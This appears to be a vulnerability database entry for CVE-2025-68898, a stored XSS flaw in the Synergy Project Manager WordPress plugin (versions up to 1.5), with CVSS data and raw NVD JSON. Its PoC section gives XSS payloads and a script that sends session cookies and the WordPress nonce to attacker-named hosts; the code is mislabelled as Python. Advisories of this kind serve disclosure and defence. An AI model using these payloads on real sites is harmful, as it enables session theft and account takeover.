Security Vulnerability Report
中文
CVE-2025-68898 CVSS 5.8 MEDIUM

CVE-2025-68898

Published: 2026-01-22 17:16:13
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in cjjparadoxmax Synergy Project Manager synergy-project-manager allows Stored XSS.This issue affects Synergy Project Manager: from n/a through <= 1.5.

CVSS Details

CVSS Score
5.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Synergy Project Manager <= 1.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-68898 Stored XSS PoC // Target: Synergy Project Manager WordPress Plugin <= 1.5 // Attack vector: Inject malicious JavaScript in plugin input fields // Example 1: Project/Task Name Field // Payload: <script>alert(document.cookie)</script> // Example 2: Description Field // Payload: <img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)> // Example 3: Comment Field // Payload: <svg onload=fetch('https://attacker.com/log?data='+btoa(document.cookie))> // The injected script will execute when any user views the affected page // Example exploitation script: (function() { // Steal session cookies var cookies = document.cookie; var token = document.querySelector('[name="_wpnonce"]')?.value || ''; // Exfiltrate data to attacker server fetch('https://attacker-controlled-server.com/collect', { method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({ cookies: cookies, token: token, url: window.location.href }) }); })();

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68898", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:13.470", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in cjjparadoxmax Synergy Project Manager synergy-project-manager allows Stored XSS.This issue affects Synergy Project Manager: from n/a through <= 1.5."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') vulnerabilidad en cjjparadoxmax Synergy Project Manager synergy-project-manager permite XSS Almacenado. Este problema afecta a Synergy Project Manager: desde n/a hasta &lt;= 1.5."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/synergy-project-manager/vulnerability/wordpress-synergy-project-manager-plugin-1-5-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}